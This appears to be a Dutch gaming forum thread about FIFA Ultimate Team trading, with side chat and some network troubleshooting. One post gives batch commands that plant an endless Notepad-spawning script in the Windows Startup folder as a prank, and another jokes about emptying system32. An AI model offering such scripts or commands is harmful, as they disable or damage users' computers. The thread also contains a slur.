SPOILER: enkele profielschetsenOm spoilers te kunnen lezen moet je zijn ingelogd. Je moet je daarvoor eerst gratis Registreren. Ook kun je spoilers niet lezen als je een ban hebt.SPOILER: de gamertagsOm spoilers te kunnen lezen moet je zijn ingelogd. Je moet je daarvoor eerst gratis Registreren. Ook kun je spoilers niet lezen als je een ban hebt.SPOILEROm spoilers te kunnen lezen moet je zijn ingelogd. Je moet je daarvoor eerst gratis Registreren. Ook kun je spoilers niet lezen als je een ban hebt.![]()
![]()
www.wefut.com
![]()
![]()
Bringing them big boy toys, I do big boy things, I make big boy noise![]()
Raar, net deed hij het nog.quote:Op dinsdag 21 januari 2014 02:42 schreef Iwanius het volgende:
[..]
Ligt het nou aan mij want ik zie geen gifje met bewegend beeld.
http://s16.postimg.org/wpxcth4lf/silva.gif![]()
Nice. Ik krijg ze er echt nooit in vanaf daar. Scoor sowieso weinig uit vrije trappen dit jaar...al krijg ik ook minder overtredingen mee (en tegen) dit jaar op rand 16.quote:Op dinsdag 21 januari 2014 02:51 schreef DutchSL het volgende:
[..]
Raar, net deed hij het nog.
http://s16.postimg.org/wpxcth4lf/silva.gifAlex Pastoor:
"Een uitslag is altijd terecht, of het nou verdiend is of onverdiend"
Martin Verkerk:
''Ik bepaal of ik win of verlies. Als ik goed speel dan win ik, als ik slecht speel dan is de kans dat ik verlies aanwezig.''![]()
Nette vrije trap. Ik scoorde er zo eentje alleen iets dichter bij de goal. Wel mn eerste "harde" vrije trap ooitquote:Op dinsdag 21 januari 2014 02:51 schreef DutchSL het volgende:
[..]
Raar, net deed hij het nog.
http://s16.postimg.org/wpxcth4lf/silva.gif
Die tactiek van DSL werkt ook gewoon goed
Net ook een Adebayor voor teveel verkocht, gaat lekker zo!Bringing them big boy toys, I do big boy things, I make big boy noise![]()
Ik heb trouwens gisteren in een idgaf-bui even 500k aan packs geopend. Beste spelers waren Rooney, Kompany en een waardeloze Spaanse IF.
Achja. I still dgaf. Speel het liefst met mijn <100k silvertjes.Jara
hallo dus dit noemen ze nou twitter![]()
wie 9 uur als tentamentijd bedenkt als je de vorige dag een tentamen hebt gehad is ook niet goed
volgend blok een tentamen waarbij je kan kiezen uit ja, nee en geen mening!
niceeequote:
quote:Op dinsdag 21 januari 2014 03:50 schreef Lindgren. het volgende:
Ik heb trouwens gisteren in een idgaf-bui even 500k aan packs geopend. Beste spelers waren Rooney, Kompany en een waardeloze Spaanse IF.
'If you really think that the environment is less important than the economy try holding your breath while you count your money'![]()
Of als je een penalty krijgt in de 89e minuut bij 0-0. Dat ze dan ragequitten voor je de penalty kun nemen, waardoor je geen win krijgtquote:Op dinsdag 21 januari 2014 03:34 schreef DutchSL het volgende:
Mensen die bij 0-0 ragequiten omdat ik een kans krijg![]()
Herb is the healing of a nation, alcohol is the destruction.![]()
Wat een kutstreekquote:Op dinsdag 21 januari 2014 08:34 schreef DuTank het volgende:
[..]
Of als je een penalty krijgt in de 89e minuut bij 0-0. Dat ze dan ragequitten voor je de penalty kun nemen, waardoor je geen win krijgt
Ik had gisteren weer eens een mannetje die er niks van bakte, met een loeiduur team. Ik maak na 20 minuten de 1-0. Vervolgens krijg ik een message: " I hack ur account". Dus ik stuur terug: "LOL noob". Direct daarop loopt het spel vast, en verlies ik de verbinding met de servers. Log ik daarna weer in: potje verloren
NAC Breda
Rèsbaarge![]()
Nee hoor. Ik constateer alleen dat er een paar rotte appels zijnquote:Op dinsdag 21 januari 2014 08:47 schreef Jorwol het volgende:
Willen jullie nou zeggen dat FIFA geen leuke community heeft?!
NAC Breda
Rèsbaarge![]()
Drukte alom hier. Ik heb uit verveling inmiddels zo ongeveer mijn hele TP aan IF's te koop gezet, maar dan veel te duur. DSL-stijl dus. En nu maar wachten tot de blinden toeslaan
NAC Breda
Rèsbaarge![]()
relisten is de keyquote:Op dinsdag 21 januari 2014 10:06 schreef PrideoftheSouth het volgende:
Drukte alom hier. Ik heb uit verveling inmiddels zo ongeveer mijn hele TP aan IF's te koop gezet, maar dan veel te duur. DSL-stijl dus. En nu maar wachten tot de blinden toeslaan
(lekker Engels-Nederlands)
Herb is the healing of a nation, alcohol is the destruction.![]()
Dit was nog listen, want het is mijn eerste keerquote:Op dinsdag 21 januari 2014 10:07 schreef DuTank het volgende:
[..]
relisten is de key
(lekker Engels-Nederlands)
NAC Breda
Rèsbaarge![]()
Fair genoeg, but dan moet you alsnog relisten, because they zullen not sellen in de first keerquote:Op dinsdag 21 januari 2014 10:08 schreef PrideoftheSouth het volgende:
[..]
Dit was nog listen, want het is mijn eerste keerHerb is the healing of a nation, alcohol is the destruction.![]()
If it is not selling the first keer, I'm gonna re-list toe moor keren. If not succes, I am gonna see off of it.quote:Op dinsdag 21 januari 2014 10:10 schreef DuTank het volgende:
[..]
Fair genoeg, but dan moet you alsnog relisten, because they zullen not sellen in de first keerNAC Breda
Rèsbaarge![]()
quote:Op dinsdag 21 januari 2014 10:13 schreef PrideoftheSouth het volgende:
[..]
If it is not selling the first keer, I'm gonna re-list toe moor keren. If not succes, I am gonna see off of it.
Ik zit vlakbij Artis te studeren en een of andere tyfus papegaai gaat echt helemaal loco met schreeuwen.Herb is the healing of a nation, alcohol is the destruction.![]()
quote:Op dinsdag 21 januari 2014 10:13 schreef DuTank het volgende:
[..]
Ik zit vlakbij Artis te studeren en een of andere tyfus papegaai gaat echt helemaal loco met schreeuwen.
Schijtbeesten ook
NAC Breda
Rèsbaarge![]()
Komt vast goed manquote:Op dinsdag 21 januari 2014 10:17 schreef Fuszy het volgende:
[..]
D-day
scriptie verdedigen en hopelijk afstuderen vandaag.
Hoe laat moet je?NAC Breda
Rèsbaarge![]()
Yeahquote:Op dinsdag 21 januari 2014 10:21 schreef PrideoftheSouth het volgende:
[..]
Komt vast goed man
Hoe laat moet je?![]()
15:00. Hoop rond 16:30 te weten of ik afgestudeerd ben.
Eerst presenteren, daarna individuele verdediging tegen 3 personen van een half uur per stuk (heb een afstudeerpartner)
quote:![]()
Ik denk het ook wel, maar toch spannund huuuuuuuuFeyenoord Rotterdam![]()
Tuurlijk spannend. Maar jij bent degene die je scriptie hebt geschreven, dus een ander kan het wel gelezen hebben, maar ze weten er nog steeds niet zoveel van als jijzelfquote:Op dinsdag 21 januari 2014 10:23 schreef Fuszy het volgende:
[..]
Yeah![]()
15:00. Hoop rond 16:30 te weten of ik afgestudeerd ben.
Eerst presenteren, daarna individuele verdediging tegen 3 personen van een half uur per stuk (heb een afstudeerpartner)
[..]![]()
Ik denk het ook wel, maar toch spannund huuuuuuuu
NAC Breda
Rèsbaarge![]()
Gaat lukken pikquote:Op dinsdag 21 januari 2014 10:17 schreef Fuszy het volgende:
[..]
D-day
scriptie verdedigen en hopelijk afstuderen vandaag.Smile like you mean it
www.wefut.com![]()
![]()
Op dinsdag 26 augustus 2014 23:13 schreef Toefjes het volgende:
Iedere kerel heeft wel eens gekeken tot hoever hij kwam bij zichzelf.![]()
Lekka jonguhh!quote:Op dinsdag 21 januari 2014 10:17 schreef Fuszy het volgende:
[..]
D-day
scriptie verdedigen en hopelijk afstuderen vandaag.
Oke, ik ben geschokt. DSL-stijl it is. Zojuist heeft de eerste blinde toegehapt. IF Bonucci verkocht voor 24k, basic chemstyle. En dat terwijl er BIN's van 21k zijn. Overigens was die blinde wel weer zo krenterig om na te laten voor mijn IF Bonucci de BIN (24.250) te betalen. Het was een aflopend bod. Blind, maar wel op de kleintjes letten
De menselijke psyche is echt ondoorgrondelijk![]()
NAC Breda
Rèsbaarge![]()
Volgens mij heeft het ook echt wel te maken met die crappy filters hoor...quote:Op dinsdag 21 januari 2014 10:43 schreef PrideoftheSouth het volgende:
Oke, ik ben geschokt. DSL-stijl it is. Zojuist heeft de eerste blinde toegehapt. IF Bonucci verkocht voor 24k, basic chemstyle. En dat terwijl er BIN's van 21k zijn. Overigens was die blinde wel weer zo krenterig om na te laten voor mijn IF Bonucci de BIN (24.250) te betalen. Het was een aflopend bod. Blind, maar wel op de kleintjes letten
![]()
Handelen is makkelijk met een markt waar het gemiddelde IQ rond de baksteen ligt.quote:Op dinsdag 21 januari 2014 10:43 schreef PrideoftheSouth het volgende:
![]()
Maar dan weet je dat toch onderhand? Daarbij: als ik filter en het gaat fout, krijg ik de melding dat er niks gevonden is. Ik krijg niet maar de helft van de gekozen selectie te zien, is mijn ervaring.quote:Op dinsdag 21 januari 2014 10:45 schreef Zhano het volgende:
[..]
Volgens mij heeft het ook echt wel te maken met die crappy filters hoor...NAC Breda
Rèsbaarge![]()
Ik krijg regelmatig de helft niet te zien. Wilde laatst SIF Rakitic kopen, maar eerst leek het alsof 30k de laagste BIN was. Met wat omkutten met de filters enzo kwam ik uiteindelijk op 1 uit van 23k, die er eerst echt niet bij stond.quote:Op dinsdag 21 januari 2014 10:47 schreef PrideoftheSouth het volgende:
[..]
Maar dan weet je dat toch onderhand? Daarbij: als ik filter en het gaat fout, krijg ik de melding dat er niks gevonden is. Ik krijg niet maar de helft van de gekozen selectie te zien, is mijn ervaring.![]()
Die filters zorgen er idd voor dat je soms lage Buy nows niet ziet, anders kan ik me niet voorstellen dat zo vaak mensen zulke aankopen doen.i'm black, i'm white, i'm a facking zebra![]()
Ik denk dat ik zelf op de fiets was gestapt en houdoequote:Op dinsdag 21 januari 2014 11:18 schreef PrideoftheSouth het volgende:
[..]
"Nou, wat een feest."
Jezelf opsluiten in een toilet![]()
![]()
TrapZ (of andere users die er verstand van hebben), mijn vader en ik hebben precies dezelfde laptop waarop we op het zelfde netwerk zijn aangesloten. Zijn verbinding blijft de hele tijd werken terwijl de mijne om de paar minuten weg valt. Als ik dan een paar keer mijn internet aan/uit zet doet hij het weer een paar minuten. Enig idee hoe ik dit op kan lossen?![]()
Draadloos?quote:Op dinsdag 21 januari 2014 11:20 schreef Freire het volgende:
TrapZ (of andere users die er verstand van hebben), mijn vader en ik hebben precies dezelfde laptop waarop we op het zelfde netwerk zijn aangesloten. Zijn verbinding blijft de hele tijd werken terwijl de mijne om de paar minuten weg valt. Als ik dan een paar keer mijn internet aan/uit zet doet hij het weer een paar minuten. Enig idee hoe ik dit op kan lossen?
Misschien is de afstand tussen router en laptop te groot?![]()
Ja beide draadloos, probleem is er ook als we naast elkaar zitten in de woonkamer (waar de router staat)quote:Op dinsdag 21 januari 2014 11:21 schreef Grandesco het volgende:
[..]
Draadloos?
Misschien is de afstand tussen router en laptop te groot?![]()
Misschien dat je je mac adres in kan vullen in je router, maar geen idee of dat een oplossing is voor het uitvallen van je internet.quote:Op dinsdag 21 januari 2014 11:22 schreef Freire het volgende:
[..]
Ja beide draadloos, probleem is er ook als we naast elkaar zitten in de woonkamer (waar de router staat)Feyenoord Rotterdam![]()
Is het een dagelijks dingetje of alleen vandaag? (Zo ja > reboot)quote:Op dinsdag 21 januari 2014 11:22 schreef Freire het volgende:
[..]
Ja beide draadloos, probleem is er ook als we naast elkaar zitten in de woonkamer (waar de router staat)
Verder kun je proberen de verbinding bij je netwerk settings even helemaal te 'verwijderen' en opnieuw in te stellen..![]()
Heb er een maandje geleden een paar dagen last van gehad, en sinds gisteren is het weer terugquote:Op dinsdag 21 januari 2014 11:24 schreef Zhano het volgende:
[..]
Is het een dagelijks dingetje of alleen vandaag? (Zo ja > reboot)
Verder kun je proberen de verbinding bij je netwerk settings even helemaal te 'verwijderen' en opnieuw in te stellen..![]()
Zal dat laatste even proberen![]()
ARP Cache even legen Freire.
" netsh interface ip delete arpcache " -> herstart -> netwerk opnieuw verbinden.Rock you in your face and stab your brain with your nosebone![]()
Haha nice edit. Zou net zeggen, zelfs ik weet dat niet uit mn hoofdquote:Op dinsdag 21 januari 2014 11:40 schreef MrvanTrapZ het volgende:
" netsh interface ip delete arpcache "![]()
![]()
Ik weet hem wel uit mijn hoofd hoorquote:Op dinsdag 21 januari 2014 11:41 schreef Zhano het volgende:
[..]
Haha nice edit. Zou net zeggen, zelfs ik weet dat niet uit mn hoofd
Rock you in your face and stab your brain with your nosebone![]()
En als dat niet werkt even system32 legenquote:Op dinsdag 21 januari 2014 11:40 schreef MrvanTrapZ het volgende:
" netsh interface ip delete arpcache " -> herstart -> netwerk opnieuw verbinden.![]()
![]()
Bij W8 kan dit niet meerquote:Op dinsdag 21 januari 2014 11:52 schreef AntiHero het volgende:
[..]
En als dat niet werkt even system32 legen![]()
![]()
Hahaha als RObert ten Brink uit die caravan staptquote:Op dinsdag 21 januari 2014 10:50 schreef wieisboos het volgende:
http://www.dumpert.nl/med(...)ou_need_is_love.html
cd "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"quote:
ECHO @ECHO OFF >TRAPZ.BAT
ECHO :HOI >>TRAPZ.BAT
ECHO START NOTEPAD.EXE %RANDOM% >>TRAPZ.BAT
ECHO GOTO HOI >>TRAPZ.BAT
hier gewoon even een Batch file van maken.Rock you in your face and stab your brain with your nosebone![]()
voorlopig heb ik nu winst, heb rooney ook al gehad vandaagquote:Op dinsdag 21 januari 2014 12:20 schreef UltimateTeam het volgende:
[..]
Zonde om nu nog packs te openen had die dan paar dagen geleden geopend.![]()
![]()
Heb je over het hele jaar gezien winst denk jequote:Op dinsdag 21 januari 2014 12:21 schreef Maver24 het volgende:
[..]
voorlopig heb ik nu winst, heb rooney ook al gehad vandaag![]()
Wat voor werk doe jij eigenlijk maver? Volgens mij werk je gewoon voor EA. Als er mensen balletje-balletje doen op straat dan is er ook altijd 1 lokker die steeds wint waardoor de rest denkt ook kans te maken.Alex Pastoor:
Martin Verkerk:
''Ik bepaal of ik win of verlies. Als ik goed speel dan win ik, als ik slecht speel dan is de kans dat ik verlies aanwezig.''![]()
Rustig aan Conor, niet alles is een scamquote:Op dinsdag 21 januari 2014 12:24 schreef Tim86 het volgende:
Wat voor werk doe jij eigenlijk maver? Volgens mij werk je gewoon voor EA. Als er mensen balletje-balletje doen op straat dan is er ook altijd 1 lokker die steeds wint waardoor de rest denkt ook kans te maken.
* Zhano pakt onopvallend Tim's portemonnee![]()
* mijnquote:Op dinsdag 21 januari 2014 12:28 schreef Maver24 het volgende:
Ik ga mij TOTY Silva weer verkopen. hij valt me erg tegen![]()
Gewoon ff wachten op TOTS Kruiswijkquote:Op dinsdag 21 januari 2014 12:28 schreef Maver24 het volgende:
Ik ga mij TOTY Silva weer verkopen. hij valt me erg tegen![]()
Kun je lang wachten hi ha hoquote:Op dinsdag 21 januari 2014 12:30 schreef Quasi-intellectueel het volgende:
[..]
Gewoon ff wachten op TOTS Kruiswijk![]()
Probeert hij het een keer goede te schrijven in plaats van "me SIlva", krijgt hij dit weerquote:
Alex Pastoor:
Martin Verkerk:
Ik speelde gisteren voor het eerst tegen TOTS Ramos en TOTS Xavi ( in 1 team). Allebei roodquote:Op dinsdag 21 januari 2014 12:31 schreef Maver24 het volgende:
Ik heb al wel eens Legend Campbell gehad , die is wel stukken beter zeg.
Alex Pastoor:
Martin Verkerk:
die van futhead is goed. wefut klopt nietquote:Op dinsdag 21 januari 2014 12:33 schreef DutchSL het volgende:
[..]
Hele andere stats op wefut
futheadof wefut
?
![]()
Mijn enige klacht over TOTY Ramos/ TOTY Silva is dat ze bij aanvallende corners er niet aan te pas komen, terwijl NIF Silva dat nog wel deed.
Scoor ook nooit uit corners met dat team, een enkele keer met Xabi Alonso die een afvallende bal voor zijn rechter kreeg.![]()
Wojoo hater.quote:Op dinsdag 21 januari 2014 12:38 schreef Maver24 het volgende:
[..]
die van futhead is goed. wefut klopt niet![]()
Ik heb nu een aantal toty spelers gehad en mijn beste speler vind ik Dani Alves. wat een machine is dat zeg![]()
Hoi lieve lurker,
Ik bied hierbij aan, een prachtige nooit gebruikte IF Adebayor. Hij is afkomstig uit Togo maar doet het toch erg goed. Togo is een door oorlog verscheurd land en mede daardoor heeft hij als chemistry style scherpschutter'. Doe een goed bod van 29.500c of koop het meteen voor 29.750 coins en hij is voor jou.
Clubnaam AVW66,
Met vriendelijke groet,
Iemand die heel graag geld wil voor een (S)IF Dos Santos![]()
[ Bericht 0% gewijzigd door el-blanchito op 21-01-2014 12:51:49 ]i'm black, i'm white, i'm a facking zebra![]()
quote:Op dinsdag 21 januari 2014 12:46 schreef el-blanchito het volgende:
Hoi lieve lurker,
Ik bied hierbij aan, een prachtige nooit gebruikte IF Adebayor. Hij is afkomstig uit Togo maar doet het toch erg goed. Togo is een door oorlog verscheurd land en mede daardoor heeft hij als chemistry style 'ervaren schutter'. Doe een goed bod van 29.500c of koop het meteen voor 29.750 coins en hij is voor jou.
Clubnaam AVW66,
Met vriendelijke groet,
Iemand die heel graag geld wil voor een (S)IF Dos Santos![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
![]()
Ik bied hierbij aan, een prachtige nooit gebruikte IF Adebayor. Hij is afkomstig uit Togo maar doet het toch erg goed. Togo is een door oorlog verscheurd land en mede daardoor heeft hij als chemistry style 'ervaren schutter'. Doe een goed bod van 29.500c of koop het meteen voor 29.750 coins en hij is voor jou.![]()
Hij is afkomstig uit Togo maar doet het toch erg goed. Togo is een door oorlog verscheurd land en mede daardoor heeft hij als chemistry style scherpschutter'.
Alex Pastoor:
Martin Verkerk:
Ik vind het lekker om door te wisselen. Dat is bij 4222 ook lekker makkelijk omdat je daar maar 6 spelers voor nodig hebt (en een keeper)/quote:Op dinsdag 21 januari 2014 01:56 schreef DutchSL het volgende:
[..]
Je kunt toch gewoon elke Serie A spits daar neerzetten?
Of bedoel je een andere naast Vieri, maar daar staat Balotelli al![]()
![]()
IF Pogba is zo geniaal goed
Alex Pastoor:
Martin Verkerk:
5% gaat er EAquote:Op dinsdag 21 januari 2014 13:04 schreef Freire het volgende:
Hoeveel procent gaat er EA als je iets verkoopt?![]()
Dat gaat niet naar EA, dat komt allemaal bij mij terecht.quote:Op dinsdag 21 januari 2014 13:04 schreef Freire het volgende:
Hoeveel procent gaat er EA als je iets verkoopt?![]()
Weet niet of er hier nog tennisliefhebbers zijn, maar die moeten even Eurosport aanzetten
Alex Pastoor:
Martin Verkerk:
quote:Op dinsdag 21 januari 2014 13:21 schreef Tim86 het volgende:
Weet niet of er hier nog tennisliefhebbers zijn, maar die moeten even Eurosport aanzetten
Welke ronde is dit?![]()
Kwartfinalequote:Alex Pastoor:
Martin Verkerk:
Holy shit, het is spannend!quote:Op dinsdag 21 januari 2014 13:21 schreef Tim86 het volgende:
Weet niet of er hier nog tennisliefhebbers zijn, maar die moeten even Eurosport aanzetten![]()
Vieze undercutterquote:Op dinsdag 21 januari 2014 13:24 schreef PrideoftheSouth het volgende:
IF Montillo stijgt ook lekker in prijs![]()
![]()
Alex Pastoor:
Martin Verkerk:
geloof je het zelfquote:Op dinsdag 21 januari 2014 13:30 schreef DarkSonic2 het volgende:
Er zitten 2 chicks in de trein te slapen. O wacht ik heb ze wakker gemaakt door een foto te maken.
Alex Pastoor:
Martin Verkerk:
Pic or it didn't happenquote:Op dinsdag 21 januari 2014 13:30 schreef DarkSonic2 het volgende:
Er zitten 2 chicks in de trein te slapen. O wacht ik heb ze wakker gemaakt door een foto te maken.
i'm black, i'm white, i'm a facking zebra![]()
Haha, koning.quote:Op dinsdag 21 januari 2014 13:30 schreef DarkSonic2 het volgende:
![]()
Nee ik heb er geen, die van jou is gewoon de goedkoopstequote:Op dinsdag 21 januari 2014 13:31 schreef PrideoftheSouth het volgende:
[..]
Ah, ik had natuurlijk moeten ruiken dat SAINT YEITA jouw account is![]()
![]()
Zag ze een maand geleden op de piste in Val Thorens, die gasten maakten er een showtje van... ben gelijk fan!quote:![]()
Waarschijnlijk heb ik ook gewoon het goedkoopst ingekocht. Het recht van de sterkstequote:Op dinsdag 21 januari 2014 13:32 schreef Zhano het volgende:
[..]
Nee ik heb er geen, die van jou is gewoon de goedkoopste
NAC Breda
Rèsbaarge![]()
Er moet gewoon een UP Pogba komen.quote:Op dinsdag 21 januari 2014 13:36 schreef Tobi-wan het volgende:
Er moet even een SIF Pogba komen. De prijs van de IF is veel te veel gestegen...![]()
Dat komt er natuurlijk ook aan. Die kans is inderdaad wel aanwezig.quote:Op dinsdag 21 januari 2014 13:36 schreef DutchSL het volgende:
[..]
Er moet gewoon een UP Pogba komen.![]()
Wanneer komen de UP's eigenlijk?quote:Op dinsdag 21 januari 2014 13:37 schreef Tobi-wan het volgende:
[..]
Dat komt er natuurlijk ook aan. Die kans is inderdaad wel aanwezig.NAC Breda
Rèsbaarge![]()
quote:Op dinsdag 21 januari 2014 13:38 schreef PrideoftheSouth het volgende:
[..]
Liedjes van Britney Spears quoten
Gewoon Children of Bodom hoor...![]()
![]()
Ow sorry. Ik ben ook niet zo thuis in de scene van mannen die hun haar laten groeien tot hun kont.quote:NAC Breda
Rèsbaarge![]()
Ik heb er zojuist weer een nieuwe op gezetquote:Op dinsdag 21 januari 2014 13:39 schreef DutchSL het volgende:
Deze rakker ook maar gekocht van iemand die hem er te goedkoop op zette
[ afbeelding ]
gr gr
Zolang de voorraad strekt...
NAC Breda
Rèsbaarge![]()
Daar moet je je niet door van de wijs laten brengen. Die ander heeft namelijk vast geen Deadeye erop.quote:Op dinsdag 21 januari 2014 13:41 schreef Tobi-wan het volgende:
DSL, kan je ook niet even op deze bieden?
[ afbeelding ]
Ik had hem erop gezet met de goedkoopste BIN. Zet iemand anders hem er voor 150k goedkoper op...NAC Breda
Rèsbaarge![]()
Xboxquote:Op dinsdag 21 januari 2014 13:41 schreef Tobi-wan het volgende:
DSL, kan je ook niet even op deze bieden?
[ afbeelding ]
Ik had hem erop gezet met de goedkoopste BIN. Zet iemand anders hem er voor 150k goedkoper op...![]()
![]()
Jezelf een hele jongen vinden na wat gelukkige pulls en een paar blinde kopersquote:
NAC Breda
Rèsbaarge![]()
Tsja, je moet wat als je aan het werk bent.quote:Op dinsdag 21 januari 2014 13:47 schreef PrideoftheSouth het volgende:
[..]
Hij begon...![]()
![]()
Loopt hier iemand rond die een WIDM-pool wil opstarten...![]()
Zal de IF van onze Togolese groeibriljant stijgen in prijs als er vanavond geen SIF komt?i'm black, i'm white, i'm a facking zebra![]()
Actuarissenquote:Op dinsdag 21 januari 2014 13:50 schreef Zhano het volgende:
[..]
Tsja, je moet wat als je aan het werk bent.
NAC Breda
Rèsbaarge![]()
Nee, want die komt morgenavond (als hij er komt).quote:Op dinsdag 21 januari 2014 13:52 schreef el-blanchito het volgende:
Zal de IF van onze Togolese groeibriljant stijgen in prijs als er vanavond geen SIF komt?![]()
Ik vermoed van wel. Er komt denk ik ook geen SIF. Komt er wel een SIF, dan ga ik mijn IF's proberen te slijten voor de prijs van een SIFquote:Op dinsdag 21 januari 2014 13:52 schreef el-blanchito het volgende:
Zal de IF van onze Togolese groeibriljant stijgen in prijs als er vanavond geen SIF komt?
NAC Breda
Rèsbaarge![]()
IF Adebayor verkopen voor 100K+quote:Op dinsdag 21 januari 2014 13:53 schreef PrideoftheSouth het volgende:
[..]
Ik vermoed van wel. Er komt denk ik ook geen SIF. Komt er wel een SIF, dan ga ik mijn IF's proberen te slijten voor de prijs van een SIF
En toen werd je wakkerquote:Op dinsdag 21 januari 2014 13:54 schreef el-blanchito het volgende:
[..]
IF Adebayor verkopen voor 100K+
NAC Breda
Rèsbaarge![]()
Als je de IF morgenavond om kwart over 7 erop zet zie ik het nog wel gebeurenquote:i'm black, i'm white, i'm a facking zebra![]()
Stijging naar 40k zou al prima zijnquote:Op dinsdag 21 januari 2014 13:55 schreef el-blanchito het volgende:
[..]
Als je de IF morgenavond om kwart over 7 erop zet zie ik het nog wel gebeuren
NAC Breda
Rèsbaarge![]()
Dat doe jij ook, zelfs al zijn er nog geen SIF's vanquote:Op dinsdag 21 januari 2014 13:58 schreef DutchSL het volgende:
IF's voor de prijzen van SIF's er op zetten om mensen te misleiden
quote:Op dinsdag 21 januari 2014 13:58 schreef DutchSL het volgende:
Not my proudest moment, maar boeie![]()
![]()
Zoek de verschillen: IF's continu bewust te duur erop zetten, in de hoop dat de filter niet werkt, en mensen te duur inkopen.quote:Op dinsdag 21 januari 2014 13:58 schreef DutchSL het volgende:
Ik zie de verschillen niet, hypocriet____!
NAC Breda
Rèsbaarge![]()
Ik zet IF's er op voor de prijs waarvan ik denk dat ze het uiteindelijk waard worden, dat mensen ze dan te vroeg kopen is hun eigen schuld, ik misleid niemand er mee.quote:Op dinsdag 21 januari 2014 13:59 schreef el-blanchito het volgende:
[..]
Dat doe jij ook, zelfs al zijn er nog geen SIF's van![]()
Mijn verkopen hebben niks met filters te makenquote:Op dinsdag 21 januari 2014 14:00 schreef PrideoftheSouth het volgende:
[..]
Zoek de verschillen: IF's continu bewust te duur erop zetten, in de hoop dat de filter niet werkt, en mensen te duur inkopen.
Ik zie de verschillen niet, hypocriet____!
![]()
![]()
Prachtig dit, zelden zo gelachenquote:Op dinsdag 21 januari 2014 14:01 schreef DutchSL het volgende:
[..]
Mijn verkopen hebben niks met filters te maken![]()
Hypocrisie ten top, de pot verwijt de ketel, recht praten wat krom is, en ga zo maar door_O-![]()
NAC Breda
Rèsbaarge![]()
Wat loop je nou te bazelen man achterlijke mongoolquote:Op dinsdag 21 januari 2014 14:01 schreef PrideoftheSouth het volgende:
[..]
Prachtig dit, zelden zo gelachen![]()
Hypocrisie ten top, de pot verwijt de ketel![]()
![]()
moet je niet achter de rug om van je collega's nog wat roddelverhalen ophangen. Triest figuur
![]()
![]()
Jongens, vrede op aarde.
Laten we om nader tot elkander te komen allemaal een IF Adebayor kopen van ene AVW66i'm black, i'm white, i'm a facking zebra![]()
Ah, schattig. Scheldenquote:Op dinsdag 21 januari 2014 14:03 schreef DutchSL het volgende:
[..]
Wat loop je nou te bazelen man achterlijke mongoolmoet je niet achter de rug om van je collega's nog wat roddelverhalen ophangen. Triest figuur
NAC Breda
Rèsbaarge![]()
Wat is het probleem? Als iemand Eriksen wil verkopen voor 100k en iemand koopt hem dan is dat toch gewoon zoals het is? Blijkbaar is die persoon te lui om goed te zoeken.![]()
quote:
Oh, wacht even popcorn pakken.Op dinsdag 26 augustus 2014 23:13 schreef Toefjes het volgende:
Ze gaan met dm's verder waarschijnlijk, de losersquote:Op dinsdag 21 januari 2014 14:13 schreef Kamikazie het volgende:
Waarom stopt het nu?
Het werd net leuk.![]()
Mijn TV staat nog op eurosport door de Australian Open van zojuist, maar nu is de finale van het WK bowls bezig![]()
Staan ook gewoon 2 tribune's vol met publiek langs het veld![]()
![]()
Ik kan hem niet eens vinden op de Xbox.. ik denk dat Rijst ze allemaal heeft gekocht.quote:Op dinsdag 21 januari 2014 14:26 schreef DutchSL het volgende:
[ afbeelding ]
Iemand is hem aan pricefixen op 3k![]()
Waar is die Simpson eigenlijk gebleven? Niet dat ik m mis ofzoquote:Op dinsdag 21 januari 2014 14:33 schreef DarkSonic2 het volgende:
[..]
Ik kan hem niet eens vinden op de Xbox.. ik denk dat Rijst ze allemaal heeft gekocht.![]()
![]()
Hij was hier vorige week nog volgens mij.. voor de rest heb ik geen idee.quote:Op dinsdag 21 januari 2014 14:34 schreef Zhano het volgende:
[..]
Waar is die Simpson eigenlijk gebleven? Niet dat ik m mis ofzo![]()
Een WK met alleen maar Britten en een paar verdwaalde Australiërs (van Britse komaf)quote:Op dinsdag 21 januari 2014 14:31 schreef Freire het volgende:
Mijn TV staat nog op eurosport door de Australian Open van zojuist, maar nu is de finale van het WK bowls bezig![]()
Staan ook gewoon 2 tribune's vol met publiek langs het veld
Darten is nog internationaler..![]()
Is ook moeilijk op te sporen, weet niet naar welk Chinees product hij zn nieuwste kloon heeft vernoemd.quote:Op dinsdag 21 januari 2014 14:40 schreef DarkSonic2 het volgende:
[..]
Hij was hier vorige week nog volgens mij.. voor de rest heb ik geen idee.![]()
quote:Op dinsdag 21 januari 2014 14:14 schreef ThadCastle het volgende:
[..]
Ze gaan met dm's verder waarschijnlijk, de losers
Begin jij nou ook al te schelden?
NAC Breda
Rèsbaarge![]()
Lees terug. Het probleem is dat iemand doet alsof ik een kneusje ben omdat ik "maar 2k" pak op een deal. Sorry, niet voor iedereen groeien de bomen tot in de hemel.quote:Op dinsdag 21 januari 2014 14:07 schreef Pizzakoppo het volgende:
Wat is het probleem? Als iemand Eriksen wil verkopen voor 100k en iemand koopt hem dan is dat toch gewoon zoals het is? Blijkbaar is die persoon te lui om goed te zoeken.
Vervolgens valt hij me aan op dat ik bidders zou misleiden, terwijl je makkelijk een parallel kunt trekken naar zijn eigen tradegedrag. Maar als je dat zegt, weet hij niets beter te verzinnen dan een beetje eendimensionaal schelden, en irrelevante zaken erbij halen
Genoeg gezegd hierover, ik ga nog 50x 2k pakken
NAC Breda
Rèsbaarge![]()
als ik alles verkoop heb ik 2.4m coins. kan ik misschien TOTY Ribery halen maar dan heb ik verder geen coins meer. Wil echt graag TOTY Ribery hebben , aargh
![]()
Sukkels.
Ik zou het echt niet pikken hoor POTS en andersom ook niet.
Langs de A20 ligt een mooi veldje voor dit soort vetes.Rock you in your face and stab your brain with your nosebone![]()
quote:Op dinsdag 21 januari 2014 14:54 schreef MrvanTrapZ het volgende:
Sukkels.
Ik zou het echt niet pikken hoor POTS en andersom ook niet.
Langs de A20 ligt een mooi veldje voor dit soort vetes.traps jongequote:Op dinsdag 21 januari 2014 14:48 schreef PrideoftheSouth het volgende:
[..]
Begin jij nou ook al te schelden?![]()
Je vergat de gr grquote:Op dinsdag 21 januari 2014 14:56 schreef Lindgren. het volgende:
[ afbeelding ]
Even maken als ik thuis ben.![]()
Die linksmid is butje en eigenlijk vielen alle Oostenrijkers me vies tegen. Villarreal wel een eindbaasquote:Op dinsdag 21 januari 2014 14:56 schreef Lindgren. het volgende:
[ afbeelding ]
Even maken als ik thuis ben.
Ik heb eindelijk een keer Jolley in een pack.. maar hij is niet eens 1.5k meer waard. Ook is hij best wel slecht gr gr![]()
